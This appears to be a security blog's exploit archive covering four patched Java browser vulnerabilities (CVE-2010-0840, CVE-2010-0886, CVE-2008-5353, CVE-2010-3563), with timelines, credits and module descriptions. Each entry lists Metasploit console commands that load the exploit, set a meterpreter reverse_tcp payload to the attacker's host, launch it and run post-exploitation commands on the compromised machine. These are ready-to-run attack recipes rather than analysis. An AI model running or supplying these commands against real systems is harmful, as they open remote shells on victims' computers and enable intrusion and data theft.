Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-08-20

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0840
ZDI-10-056

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0886 : Sun Java Web Start Plugin Command Line Argument Injection

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-04-09
Same vulnerability disclosed by Rubén the 2010-04-09
Metasploit PoC provided by jduck the 2010-04-14

    PoC provided by :

Tavis Ormandy
Rubén
jduck

    Reference(s) :

CVE-2010-0886

    Affected version(s) :

Java 6 Standard Edition prior to update 20

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 “are believed to be affected by this vulnerability.” In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

    Commands :

use exploit/windows/browser/java_ws_arginjec­t_altjvm
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2008-5353 : Sun Java Calendar Deserialization Exploit

Timeline :

Vulnerability reported by Sami Koivu the 2008-08-01
Vulnerability fixed by Sun the 2008-12-03
PoC provided the 2009-05-19
Metasploit PoC provided by hdm the 2009-06-16

    PoC provided by :

Sami Koivu
sf
hdm

    Reference(s) :

CVE-2008-5353

    Affected version(s) :

JRE & JDK version 6 prior to update 11
JRE & JDK version 5 prior to update 16
JRE & JDK version 1.4.2_18 and prior

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).

    Commands :

use exploit/multi/browser/java_calendar_dese­rialize
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit

Timeline :

Vulnerability reported by Matthias Kaiser between ZDI to Oracle the 2010-04-05
Coordinated public release of advisory the 2010-10-12
Metasploit PoC provided by egypt the 2010-11-19

    PoC provided by :

Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-3563

    Affected version(s) :

Java 6 Standard Edition prior to update 22

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”

    Commands :

use exploit/windows/browser/java_basicservic­e_impl
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig